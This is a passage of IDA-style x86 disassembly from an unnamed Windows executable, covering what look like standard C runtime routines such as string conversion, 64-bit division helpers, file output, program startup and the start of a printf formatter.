mov eax, [ebp+arg_0]
cmp eax, 61h
jl loc_424A18
cmp eax, 7Ah
jg loc_424A18
sub eax, 20h
jmp loc_424A18
; ---------------------------------------------------------------------------
loc_42497A: ; CODE XREF: sub_42494F+C�j
mov ebx, [ebp+arg_0]
cmp ebx, 100h
jge short loc_4249AD
cmp dword_449A44, 1
jle short loc_42499A
push 2
push ebx
call sub_42653A
pop ecx
pop ecx
jmp short loc_4249A5
; ---------------------------------------------------------------------------
loc_42499A: ; CODE XREF: sub_42494F+3D�j
mov eax, off_449838
mov al, [eax+ebx*2]
and eax, 2
loc_4249A5: ; CODE XREF: sub_42494F+49�j
test eax, eax
jnz short loc_4249AD
loc_4249A9: ; CODE XREF: sub_42494F+AF�j
mov eax, ebx
jmp short loc_424A18
; ---------------------------------------------------------------------------
loc_4249AD: ; CODE XREF: sub_42494F+34�j
; sub_42494F+58�j
mov edx, off_449838
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_4249D0
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
push 2
jmp short loc_4249D9
; ---------------------------------------------------------------------------
loc_4249D0: ; CODE XREF: sub_42494F+71�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
push 1
loc_4249D9: ; CODE XREF: sub_42494F+7F�j
pop eax
lea ecx, [ebp+var_4]
push 1
push 0
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push dword_6314C8
call sub_429BA7
add esp, 20h
test eax, eax
jz short loc_4249A9
cmp eax, 1
jnz short loc_424A0B
movzx eax, [ebp+var_4]
jmp short loc_424A18
; ---------------------------------------------------------------------------
loc_424A0B: ; CODE XREF: sub_42494F+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_424A18: ; CODE XREF: sub_42494F+14�j
; sub_42494F+1D�j ...
pop ebx
leave
retn
sub_42494F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_424A20 proc near ; CODE XREF: sub_418AA2+3D�p
; sub_41F537+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_424A41
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_424A91
; ---------------------------------------------------------------------------
loc_424A41: ; CODE XREF: sub_424A20+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_424A4F: ; CODE XREF: sub_424A20+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_424A4F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_424A7A
cmp edx, [esp+4+arg_4]
ja short loc_424A7A
jb short loc_424A82
cmp eax, [esp+4+arg_0]
jbe short loc_424A82
loc_424A7A: ; CODE XREF: sub_424A20+4A�j
; sub_424A20+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_424A82: ; CODE XREF: sub_424A20+52�j
; sub_424A20+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_424A91: ; CODE XREF: sub_424A20+1F�j
pop ebx
retn 10h
sub_424A20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_424AA0 proc near ; CODE XREF: sub_418AA2+24�p
; sub_41F537+3F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_424AC2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_424B03
; ---------------------------------------------------------------------------
loc_424AC2: ; CODE XREF: sub_424AA0+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_424AD0: ; CODE XREF: sub_424AA0+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_424AD0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_424AFE
cmp edx, [esp+8+arg_4]
ja short loc_424AFE
jb short loc_424AFF
cmp eax, [esp+8+arg_0]
jbe short loc_424AFF
loc_424AFE: ; CODE XREF: sub_424AA0+4E�j
; sub_424AA0+54�j
dec esi
loc_424AFF: ; CODE XREF: sub_424AA0+56�j
; sub_424AA0+5C�j
xor edx, edx
mov eax, esi
loc_424B03: ; CODE XREF: sub_424AA0+20�j
pop esi
pop ebx
retn 10h
sub_424AA0 endp
; =============== S U B R O U T I N E =======================================
sub_424B08 proc near ; CODE XREF: sub_41AD33+10B�p
; sub_421589+2CC�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp word ptr [ecx], 0
lea eax, [ecx+2]
jz short loc_424B1F
loc_424B15: ; CODE XREF: sub_424B08+15�j
mov dx, [eax]
inc eax
inc eax
test dx, dx
jnz short loc_424B15
loc_424B1F: ; CODE XREF: sub_424B08+B�j
sub eax, ecx
sar eax, 1
dec eax
retn
sub_424B08 endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424B30 proc near ; DATA XREF: .text:0041F930�o
; sub_41F9B7+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_424BD0
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_424B63: ; CODE XREF: sub_424B30+90�j
cmp esi, 0FFFFFFFFh
jz short loc_424BC9
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_424BB7
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_424BB7
js short loc_424BC2
mov edi, [ebx+8]
push ebx
call sub_423978
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4239BA
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_423A4E
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_424BB7: ; CODE XREF: sub_424B30+40�j
; sub_424B30+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_424B63
; ---------------------------------------------------------------------------
loc_424BC2: ; CODE XREF: sub_424B30+54�j
mov eax, 0
jmp short loc_424BE5
; ---------------------------------------------------------------------------
loc_424BC9: ; CODE XREF: sub_424B30+36�j
mov eax, 1
jmp short loc_424BE5
; ---------------------------------------------------------------------------
loc_424BD0: ; CODE XREF: sub_424B30+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4239BA
add esp, 8
pop ebp
mov eax, 1
loc_424BE5: ; CODE XREF: sub_424B30+97�j
; sub_424B30+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_424B30 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4239BA
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424C08 proc near ; CODE XREF: sub_41FE93+2CF�p
; sub_41FE93+364�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push [ebp+arg_C]
call sub_42483C
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_424C37
push [ebp+arg_C]
mov esi, eax
call sub_42488E
add esp, 18h
mov eax, esi
pop esi
pop ebp
retn
sub_424C08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424C37 proc near ; CODE XREF: sub_424C08+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
test edi, edi
mov [ebp+arg_0], eax
mov ebx, edi
jnz short loc_424C5B
xor eax, eax
jmp loc_424D28
; ---------------------------------------------------------------------------
loc_424C5B: ; CODE XREF: sub_424C37+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_424C6E
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_424C75
; ---------------------------------------------------------------------------
loc_424C6E: ; CODE XREF: sub_424C37+2D�j
mov [ebp+arg_C], 1000h
loc_424C75: ; CODE XREF: sub_424C37+35�j
; sub_424C37+E8�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_424CA9
mov eax, [esi+4]
test eax, eax
jz short loc_424CA9
cmp ebx, eax
mov edi, ebx
jb short loc_424C8F
mov edi, eax
loc_424C8F: ; CODE XREF: sub_424C37+54�j
push edi
push [ebp+arg_0]
push dword ptr [esi]
call sub_4223F0
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+arg_0], edi
jmp short loc_424CEF
; ---------------------------------------------------------------------------
loc_424CA9: ; CODE XREF: sub_424C37+47�j
; sub_424C37+4E�j
cmp ebx, [ebp+arg_C]
jb short loc_424CF4
test ecx, ecx
jz short loc_424CBD
push esi
call sub_42671D
test eax, eax
pop ecx
jnz short loc_424D36
loc_424CBD: ; CODE XREF: sub_424C37+79�j
cmp [ebp+arg_C], 0
jz short loc_424CD0
mov eax, ebx
xor edx, edx
div [ebp+arg_C]
mov edi, ebx
sub edi, edx
jmp short loc_424CD2
; ---------------------------------------------------------------------------
loc_424CD0: ; CODE XREF: sub_424C37+8A�j
mov edi, ebx
loc_424CD2: ; CODE XREF: sub_424C37+97�j
push edi
push [ebp+arg_0]
push dword ptr [esi+10h]
call sub_42AE6D
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_424D2D
add [ebp+arg_0], eax
sub ebx, eax
cmp eax, edi
jb short loc_424D2D
loc_424CEF: ; CODE XREF: sub_424C37+70�j
mov edi, [ebp+var_4]
jmp short loc_424D1D
; ---------------------------------------------------------------------------
loc_424CF4: ; CODE XREF: sub_424C37+75�j
mov eax, [ebp+arg_0]
push esi
movsx eax, byte ptr [eax]
push eax
call sub_425014
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_424D36
inc [ebp+arg_0]
mov eax, [esi+18h]
dec ebx
mov [ebp+arg_C], eax
test eax, eax
jg short loc_424D1D
mov [ebp+arg_C], 1
loc_424D1D: ; CODE XREF: sub_424C37+BB�j
; sub_424C37+DD�j
test ebx, ebx
jnz loc_424C75
mov eax, [ebp+arg_8]
loc_424D28: ; CODE XREF: sub_424C37+1F�j
; sub_424C37+108�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_424D2D: ; CODE XREF: sub_424C37+AD�j
; sub_424C37+B6�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp+var_4]
jmp short loc_424D38
; ---------------------------------------------------------------------------
loc_424D36: ; CODE XREF: sub_424C37+84�j
; sub_424C37+CF�j
mov eax, edi
loc_424D38: ; CODE XREF: sub_424C37+FD�j
sub eax, ebx
xor edx, edx
div [ebp+arg_4]
jmp short loc_424D28
sub_424C37 endp
; =============== S U B R O U T I N E =======================================
sub_424D41 proc near ; CODE XREF: sub_421589+36A�p
; sub_421589+3DA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push esi
mov dx, [ecx]
lea esi, [eax+2]
mov [eax], dx
loc_424D53: ; CODE XREF: sub_424D41+21�j
inc ecx
inc ecx
test dx, dx
jz short loc_424D64
mov dx, [ecx]
mov [esi], dx
inc esi
inc esi
jmp short loc_424D53
; ---------------------------------------------------------------------------
loc_424D64: ; CODE XREF: sub_424D41+17�j
pop esi
retn
sub_424D41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424D66 proc near ; CODE XREF: sub_421589+168�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, offset dword_63198C
push edi
push esi
call dword_42F200 ; InterlockedIncrement
mov edi, dword_42F1FC
xor ebx, ebx
cmp dword_631988, ebx
jz short loc_424D96
push esi
call edi ; dword_42F1FC
push 13h
call sub_428436
pop ecx
push 1
pop ebx
loc_424D96: ; CODE XREF: sub_424D66+20�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_424DC3
add esp, 0Ch
mov [ebp+arg_8], eax
test ebx, ebx
jz short loc_424DB8
push 13h
call sub_428497
pop ecx
jmp short loc_424DBB
; ---------------------------------------------------------------------------
loc_424DB8: ; CODE XREF: sub_424D66+46�j
push esi
call edi ; dword_42F1FC
loc_424DBB: ; CODE XREF: sub_424D66+50�j
mov eax, [ebp+arg_8]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_424D66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424DC3 proc near ; CODE XREF: sub_424D66+39�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_424E91
mov edi, [ebp+arg_8]
cmp edi, esi
jz loc_424EBE
cmp dword_6314C8, esi
jnz short loc_424E14
cmp edi, esi
jbe loc_424EBE
loc_424DF3: ; CODE XREF: sub_424DC3+4A�j
mov ecx, [ebp+arg_4]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
loc_424DFF: ; DATA XREF: .text:004321D0�o
cmp byte ptr [ecx], 0
jz loc_424EBE
inc eax
inc edx
inc edx
cmp eax, edi
jb short loc_424DF3
jmp loc_424EBE
; ---------------------------------------------------------------------------
loc_424E14: ; CODE XREF: sub_424DC3+26�j
mov ebx, [ebp+arg_4]
mov esi, dword_42F098
push edi
push edx
push 0FFFFFFFFh
push ebx
push 9
push dword_6314D8
call esi ; dword_42F098
test eax, eax
jnz loc_424EBD
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_424E4F
loc_424E3F: ; CODE XREF: sub_424DC3+CC�j
; sub_424DC3+F8�j
call sub_426528
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_424EBE
; ---------------------------------------------------------------------------
loc_424E4F: ; CODE XREF: sub_424DC3+7A�j
lea ecx, [edi-1]
mov eax, ebx
mov [ebp+arg_4], ecx
loc_424E57: ; CODE XREF: sub_424DC3+B4�j
mov cl, [eax]
test cl, cl
jz short loc_424E79
mov edx, off_449838
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_424E6E
inc eax
loc_424E6E: ; CODE XREF: sub_424DC3+A8�j
mov ecx, [ebp+arg_4]
inc eax
dec [ebp+arg_4]
test ecx, ecx
jnz short loc_424E57
loc_424E79: ; CODE XREF: sub_424DC3+98�j
push edi
sub eax, ebx
push [ebp+arg_0]
push eax
push ebx
push 1
push dword_6314D8
call esi ; dword_42F098
test eax, eax
jnz short loc_424EBE
jmp short loc_424E3F
; ---------------------------------------------------------------------------
loc_424E91: ; CODE XREF: sub_424DC3+F�j
cmp dword_6314C8, esi
jnz short loc_424EA4
push [ebp+arg_4]
call sub_422120
pop ecx
jmp short loc_424EBE
; ---------------------------------------------------------------------------
loc_424EA4: ; CODE XREF: sub_424DC3+D4�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_4]
push 9
push dword_6314D8
call dword_42F098 ; MultiByteToWideChar
cmp eax, esi
jz short loc_424E3F
loc_424EBD: ; CODE XREF: sub_424DC3+6B�j
dec eax
loc_424EBE: ; CODE XREF: sub_424DC3+1A�j
; sub_424DC3+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_424DC3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F458
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call dword_42F218 ; GetVersion
xor edx, edx
mov dl, ah
mov dword_631478, edx
mov ecx, eax
and ecx, 0FFh
mov dword_631474, ecx
shl ecx, 8
add ecx, edx
mov dword_631470, ecx
shr eax, 10h
mov dword ptr byte_63146C, eax
push 1
call sub_42719C
pop ecx
test eax, eax
jnz short loc_424F2E
push 1Ch
call sub_424FF0
pop ecx
loc_424F2E: ; CODE XREF: .text:00424F24�j
call sub_425936
test eax, eax
jnz short loc_424F3F
push 10h
call sub_424FF0
pop ecx
loc_424F3F: ; CODE XREF: .text:00424F35�j
xor esi, esi
mov [ebp-4], esi
call sub_426B40
call dword_42F214 ; GetCommandLineA
mov dword_631AE4, eax
call sub_42B533
mov dword_6313EC, eax
call sub_42B2E6
call sub_42B22D
call sub_4284AC
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call dword_42F210 ; GetStartupInfoA
call sub_42B1D5
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_424F8E
movzx eax, word ptr [ebp-2Ch]
jmp short loc_424F91
; ---------------------------------------------------------------------------
loc_424F8E: ; CODE XREF: .text:00424F86�j
push 0Ah
pop eax
loc_424F91: ; CODE XREF: .text:00424F8C�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword_42F074 ; GetModuleHandleA
push eax
call sub_4120E9
mov [ebp-60h], eax
push eax
call sub_4284D9
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_42B05D
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_4284EA
; =============== S U B R O U T I N E =======================================
sub_424FCB proc near ; CODE XREF: sub_42322C+16�p
; sub_424780+4D�p ...
arg_0 = dword ptr 4
cmp dword_6313F4, 1
jnz short loc_424FD9
call sub_42B665
loc_424FD9: ; CODE XREF: sub_424FCB+7�j
push [esp+arg_0]
call sub_42B69E
push 0FFh
call off_4496B0
pop ecx
pop ecx
retn
sub_424FCB endp
; =============== S U B R O U T I N E =======================================
sub_424FF0 proc near ; CODE XREF: .text:00424F28�p
; .text:00424F39�p
arg_0 = dword ptr 4
cmp dword_6313F4, 1
jnz short loc_424FFE
call sub_42B665
loc_424FFE: ; CODE XREF: sub_424FF0+7�j
push [esp+arg_0]
call sub_42B69E
pop ecx
push 0FFh
call dword_42F06C ; ExitProcess
retn
sub_424FF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425014 proc near ; CODE XREF: sub_422063+46�p
; sub_42219B+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_425120
test al, 40h
jnz loc_425120
test al, 1
jz short loc_42504C
and dword ptr [esi+4], 0
test al, 10h
jz loc_425120
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_42504C: ; CODE XREF: sub_425014+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_425086
cmp esi, offset dword_449450
jz short loc_425074
cmp esi, offset dword_449470
jnz short loc_42507F
loc_425074: ; CODE XREF: sub_425014+56�j
push ebx
call sub_42B835
test eax, eax
pop ecx
jnz short loc_425086
loc_42507F: ; CODE XREF: sub_425014+5E�j
push esi
call sub_42B7F1
pop ecx
loc_425086: ; CODE XREF: sub_425014+4E�j
; sub_425014+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_4250F6
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_4250B6
push edi
push eax
push ebx
call sub_42AE6D
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_4250EC
; ---------------------------------------------------------------------------
loc_4250B6: ; CODE XREF: sub_425014+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_4250D4
mov ecx, ebx
mov eax, ebx
sar ecx, 5
and eax, 1Fh
mov ecx, dword_6319E0[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
jmp short loc_4250D9
; ---------------------------------------------------------------------------
loc_4250D4: ; CODE XREF: sub_425014+A5�j
mov eax, offset dword_449A50
loc_4250D9: ; CODE XREF: sub_425014+BE�j
test byte ptr [eax+4], 20h
jz short loc_4250EC
push 2
push 0
push ebx
call sub_426CFC
add esp, 0Ch
loc_4250EC: ; CODE XREF: sub_425014+A0�j
; sub_425014+C9�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_42510A
; ---------------------------------------------------------------------------
loc_4250F6: ; CODE XREF: sub_425014+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_42AE6D
add esp, 0Ch
mov [ebp+arg_4], eax
loc_42510A: ; CODE XREF: sub_425014+E0�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_425116
or dword ptr [esi+0Ch], 20h
jmp short loc_425125
; ---------------------------------------------------------------------------
loc_425116: ; CODE XREF: sub_425014+FA�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_425128
; ---------------------------------------------------------------------------
loc_425120: ; CODE XREF: sub_425014+10�j
; sub_425014+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_425125: ; CODE XREF: sub_425014+100�j
or eax, 0FFFFFFFFh
loc_425128: ; CODE XREF: sub_425014+10A�j
pop esi
pop ebx
pop ebp
retn
sub_425014 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42512C proc near ; CODE XREF: sub_422063+29�p
; sub_42219B+28�p ...
var_248 = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_425845
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_425160
; ---------------------------------------------------------------------------
loc_425158: ; CODE XREF: sub_42512C+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
loc_425160: ; CODE XREF: sub_42512C+2A�j
cmp [ebp+var_14], edx
jl loc_425845
cmp bl, 20h
jl short loc_425181
cmp bl, 78h
jg short loc_425181
movsx eax, bl
mov al, byte_42F444[eax]
and eax, 0Fh
jmp short loc_425183
; ---------------------------------------------------------------------------
loc_425181: ; CODE XREF: sub_42512C+40�j
; sub_42512C+45�j
xor eax, eax
loc_425183: ; CODE XREF: sub_42512C+53�j
movsx eax, byte_42F464[esi+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_425834 ; default
jmp off_42584D[eax*4] ; switch jump
loc_4251A1: ; DATA XREF: .text:off_42584D�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 0042519A case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_4251BC: ; CODE XREF: sub_42512C+6E�j
; DATA XREF: .text:off_42584D�o
movsx eax, bl ; jumptable 0042519A case 2
sub eax, 20h
jz short loc_4251FF
sub eax, 3
jz short loc_4251F6
sub eax, 8
jz short loc_4251ED
dec eax
dec eax
jz short loc_4251E4
sub eax, 3
jnz loc_425834 ; default
or [ebp+var_4], 8
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_4251E4: ; CODE XREF: sub_42512C+A4�j
or [ebp+var_4], 4
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_4251ED: ; CODE XREF: sub_42512C+A0�j
or [ebp+var_4], 1
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_4251F6: ; CODE XREF: sub_42512C+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_4251FF: ; CODE XREF: sub_42512C+96�j
or [ebp+var_4], 2
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_425208: ; CODE XREF: sub_42512C+6E�j
; DATA XREF: .text:off_42584D�o
cmp bl, 2Ah ; jumptable 0042519A case 3
jnz short loc_425230
lea eax, [ebp+arg_8]
push eax
call sub_42590B
test eax, eax
pop ecx
mov [ebp+var_20], eax
jge loc_425834 ; default
or [ebp+var_4], 4
neg eax
loc_425228: ; CODE XREF: sub_42512C+111�j
mov [ebp+var_20], eax
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_425230: ; CODE XREF: sub_42512C+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_425228
; ---------------------------------------------------------------------------
loc_42523F: ; CODE XREF: sub_42512C+6E�j
; DATA XREF: .text:off_42584D�o
mov [ebp+var_10], edx ; jumptable 0042519A case 4
loc_425242: ; DATA XREF: .text:off_4337F4�o
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_425247: ; CODE XREF: sub_42512C+6E�j
; DATA XREF: .text:off_42584D�o
cmp bl, 2Ah ; jumptable 0042519A case 5
jnz short loc_42526A
lea eax, [ebp+arg_8]
push eax
call sub_42590B
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_425834 ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_42526A: ; CODE XREF: sub_42512C+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_42527C: ; CODE XREF: sub_42512C+6E�j
; DATA XREF: .text:off_42584D�o
cmp bl, 49h ; jumptable 0042519A case 6
jz short loc_4252AF
cmp bl, 68h
jz short loc_4252A6
cmp bl, 6Ch
jz short loc_42529D
cmp bl, 77h
jnz loc_425834 ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_42529D: ; CODE XREF: sub_42512C+15D�j
or [ebp+var_4], 10h
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_4252A6: ; CODE XREF: sub_42512C+158�j
or [ebp+var_4], 20h
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_4252AF: ; CODE XREF: sub_42512C+153�j
cmp byte ptr [edi], 36h
jnz short loc_4252C8
cmp byte ptr [edi+1], 34h
jnz short loc_4252C8
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_425834 ; default
; ---------------------------------------------------------------------------
loc_4252C8: ; CODE XREF: sub_42512C+186�j
; sub_42512C+18C�j
mov [ebp+var_30], edx
loc_4252CB: ; CODE XREF: sub_42512C+6E�j
; DATA XREF: .text:off_42584D�o
mov ecx, off_449838 ; jumptable 0042519A case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_4252F7
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
